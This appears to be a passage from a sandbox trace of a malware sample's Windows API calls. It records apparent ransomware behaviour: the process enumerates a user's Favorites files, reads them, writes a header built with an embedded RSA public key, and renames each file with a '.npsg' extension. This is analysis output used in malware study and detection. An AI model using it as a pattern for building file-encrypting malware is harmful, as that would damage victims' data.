RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0237.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008a8 [0237.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400848 [0238.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400860 [0238.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400830 [0238.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008c0 [0238.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400890 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400878 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008d8 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400878 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400878 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400848 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0238.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400878 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400830 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400818 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409830 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.004] WriteFile (in: hFile=0x644, lpBuffer=0x64e690*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x64e690*, lpNumberOfBytesWritten=0x39afb14*=0x80, lpOverlapped=0x0) returned 1 [0238.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.004] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.004] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0238.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.005] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.005] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.005] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.005] CloseHandle (hObject=0x644) returned 1 [0238.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0238.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0238.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0238.008] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.npsg")) returned 1 [0238.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.009] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0238.011] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0238.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70e008 [0238.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0238.011] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0238.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.012] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0238.012] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.015] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.015] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.017] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.017] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0238.017] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.017] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.018] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.018] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.019] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.019] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.019] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.019] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.019] GetLastError () returned 0x0 [0238.020] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.020] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.020] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.020] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.020] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0238.020] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409830 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400818 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409878 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400830 [0238.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400860 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008c0 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400878 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.021] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0238.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400878 | out: hHeap=0x620000) returned 1 [0238.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008c0 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400878 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400860 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400878 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.022] GetCurrentThreadId () returned 0x5b4 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b83098 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.022] RtlAllocateHeap 